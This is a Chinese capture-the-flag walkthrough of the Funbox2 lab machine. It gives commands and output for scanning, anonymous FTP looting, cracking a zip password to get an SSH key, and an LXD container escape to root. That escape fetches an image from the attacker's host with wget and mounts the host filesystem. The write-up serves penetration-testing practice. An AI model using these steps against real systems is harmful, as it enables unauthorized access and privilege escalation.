1.探测靶机ip地址
ip a看一下网卡
netdiscover -i eth0 -r 192.168.100.0/24
可以看到靶机地址为192.168.100.6
2.nmap进行靶机端口服务扫描
nmap -sS -Pn -A -p- -n 192.168.100.6-sS SYN 扫描,半连接
-Pn 跳过Ping扫描阶段
-A 全面扫描
-p- 全端口
-n 禁止DNS反向解析,如果单纯扫描一段IP,该选项可以大幅度减少目标主机响应时间
可以看到靶机开放了21/ftp、22/ssh、80/http端口
3.根据端口服务进行信息收集
(1)80/http端口
我们访问下80页面进行下信息收集:查看源码、dirb扫描
但是没收集到有用的信息,80端口没啥东西!!!!
dirb http://192.168.100.6
扫出了robots.txt 看下发现logs目录
看下logs
http://192.168.100.6/logs/
访问这个目录404了
(2)22/ssh端口
一般只能暴力破解,但没有合适的字典,看看之后能不能找到相关的用户名密码
(3)21/ftp端口
尝试FTP匿名登陆
ftp 192.168.100.6
可以看到匿名登陆成功,ftp有很多文件,都get下来
┌──(root㉿kali)-[~]
└─# ftp 192.168.100.6
Connected to 192.168.100.6.
220 ProFTPD 1.3.5e Server (Debian) [::ffff:192.168.100.6]
Name (192.168.100.6:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230-Welcome, archive user anonymous@192.168.100.4 !
230-
230-The local time is: Tue Jul 05 06:42:45 2022
230-
230-This is an experimental FTP server. If you have any unusual problems,
230-please report them via e-mail to <root@funbox2>.
230-
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
229 Entering Extended Passive Mode (|||1516|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 .
drwxr-xr-x 2 ftp ftp 4096 Jul 25 2020 ..
-rw-r--r-- 1 ftp ftp 153 Jul 25 2020 .@admins
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 anna.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 ariel.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 bud.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 cathrine.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 homer.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 jessica.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 john.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 marge.zip
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 miriam.zip
-r--r--r-- 1 ftp ftp 1477 Jul 25 2020 tom.zip
-rw-r--r-- 1 ftp ftp 114 Jul 25 2020 .@users
-rw-r--r-- 1 ftp ftp 170 Jan 10 2018 welcome.msg
-rw-rw-r-- 1 ftp ftp 1477 Jul 25 2020 zlatan.zip
226 Transfer complete
ftp> get anna.zip
local: anna.zip remote: anna.zip
229 Entering Extended Passive Mode (|||21401|)
150 Opening BINARY mode data connection for anna.zip (1477 bytes)
100% |*************************************************************| 1477 108.55 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (102.32 KiB/s)
ftp> get ariel.zip
local: ariel.zip remote: ariel.zip
229 Entering Extended Passive Mode (|||57027|)
150 Opening BINARY mode data connection for ariel.zip (1477 bytes)
100% |*************************************************************| 1477 1.29 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (860.09 KiB/s)
ftp> get bud.zip
local: bud.zip remote: bud.zip
229 Entering Extended Passive Mode (|||39230|)
150 Opening BINARY mode data connection for bud.zip (1477 bytes)
100% |*************************************************************| 1477 1.16 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (796.01 KiB/s)
ftp> get cathrine.zip
local: cathrine.zip remote: cathrine.zip
229 Entering Extended Passive Mode (|||39648|)
150 Opening BINARY mode data connection for cathrine.zip (1477 bytes)
100% |*************************************************************| 1477 1.42 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (905.45 KiB/s)
ftp> get homer.zip
local: homer.zip remote: homer.zip
229 Entering Extended Passive Mode (|||49351|)
150 Opening BINARY mode data connection for homer.zip (1477 bytes)
100% |*************************************************************| 1477 1.06 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (764.78 KiB/s)
ftp> get jessica.zip
local: jessica.zip remote: jessica.zip
229 Entering Extended Passive Mode (|||24613|)
150 Opening BINARY mode data connection for jessica.zip (1477 bytes)
100% |*************************************************************| 1477 994.06 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (629.86 KiB/s)
ftp> get john.zip
local: john.zip remote: john.zip
229 Entering Extended Passive Mode (|||35794|)
150 Opening BINARY mode data connection for john.zip (1477 bytes)
100% |*************************************************************| 1477 1.05 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (750.45 KiB/s)
ftp> get marge.zip
local: marge.zip remote: marge.zip
229 Entering Extended Passive Mode (|||48076|)
150 Opening BINARY mode data connection for marge.zip (1477 bytes)
100% |*************************************************************| 1477 105.49 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (100.46 KiB/s)
ftp> get miriam.zip
local: miriam.zip remote: miriam.zip
229 Entering Extended Passive Mode (|||42020|)
150 Opening BINARY mode data connection for miriam.zip (1477 bytes)
100% |*************************************************************| 1477 1.57 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (1.03 MiB/s)
ftp> get tom.zip
local: tom.zip remote: tom.zip
229 Entering Extended Passive Mode (|||57570|)
150 Opening BINARY mode data connection for tom.zip (1477 bytes)
100% |*************************************************************| 1477 111.75 KiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (105.62 KiB/s)
ftp> get welcome.msg
local: welcome.msg remote: welcome.msg
229 Entering Extended Passive Mode (|||37150|)
150 Opening BINARY mode data connection for welcome.msg (170 bytes)
100% |*************************************************************| 170 1.30 MiB/s 00:00 ETA
226 Transfer complete
170 bytes received in 00:00 (232.84 KiB/s)
ftp> get zlatan.zip
local: zlatan.zip remote: zlatan.zip
229 Entering Extended Passive Mode (|||36472|)
150 Opening BINARY mode data connection for zlatan.zip (1477 bytes)
100% |*************************************************************| 1477 1.48 MiB/s 00:00 ETA
226 Transfer complete
1477 bytes received in 00:00 (955.21 KiB/s)
解压这些压缩包,发现所有压缩包都需要密码,而且都有id_rsa文件,压缩包名很可能为用户名
看下welcome.msg内容
┌──(root㉿kali)-[~]
└─# cat welcome.msg
Welcome, archive user %U@%R !
The local time is: %T
This is an experimental FTP server. If you have any unusual problems,
please report them via e-mail to <root@%L>.
4.漏洞利用
一、破解压缩包密码
(1)使用john
挨个压缩包使用john尝试破解
发现只有tom.zip破解成功
得到压缩包密码:iubire
(2)使用fcrakzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u xxx.zip
逐一尝试后发现只有Tom爆破成功密码为iubire,解压出来得到一个ras的加密密钥
二、尝试的登录ssh
ssh -i id_rsa tom@192.168.100.6
成功登录
三、提权操作
(1)信息收集,直接sudo su
查看用户文件夹
ls -al
查看一下history文件
发现用户名密码
tom///xx11yy22!
查看下用户组:
id
查看sudo权限
sudo -l
发现直接可以无密码sudo su
(2)lxc提权
查看用户组的时候发现了一个可以提权漏洞:lxc提权
lxc是linux中自带的一个轻量级的容器,它执行一个root进程,通过适当的操作可以将lxd组中的成员提权为root,
一个方式就是利用LXD API将目标主机的文件系统加载到容器中,那么普通用户就相当于成为一个root提权分为两个步骤:
首先kali端shell:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./bulid-alpine
python -m SimpleHTTPServer #调用SimpleHTTPServer快速传输文件
靶机端shell(感觉和docker的使用很相似):
wget http://192.168.100.4:8000/alpine-v3.16-x86_64-20220705_2113.tar.gz
lxc image import ./alpine-v3.16-x86_64-20220705_2113.tar.gz --alias rock
lxc image list
lxd init #初始化
lxc init rock shao -c security.privileged=true
lxc config device add shao rock disk source=/ path=/mnt/root recursive=true
lxc start shao
lxc exec shao /bin/sh
得到root权限
查看flag.txt
5.靶场总结
此次靶场通过信息收集目录扫描FTP匿名登陆获取敏感文件,利用john/fcrakzip进行破解密码,解压之后获取SSH私钥登陆SSHgetshell,利用信息收集获取账号密码之后进行提权操作
发现主机
端口扫描
目录扫描
ftp匿名登陆
john破解/fcrakzip提权
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容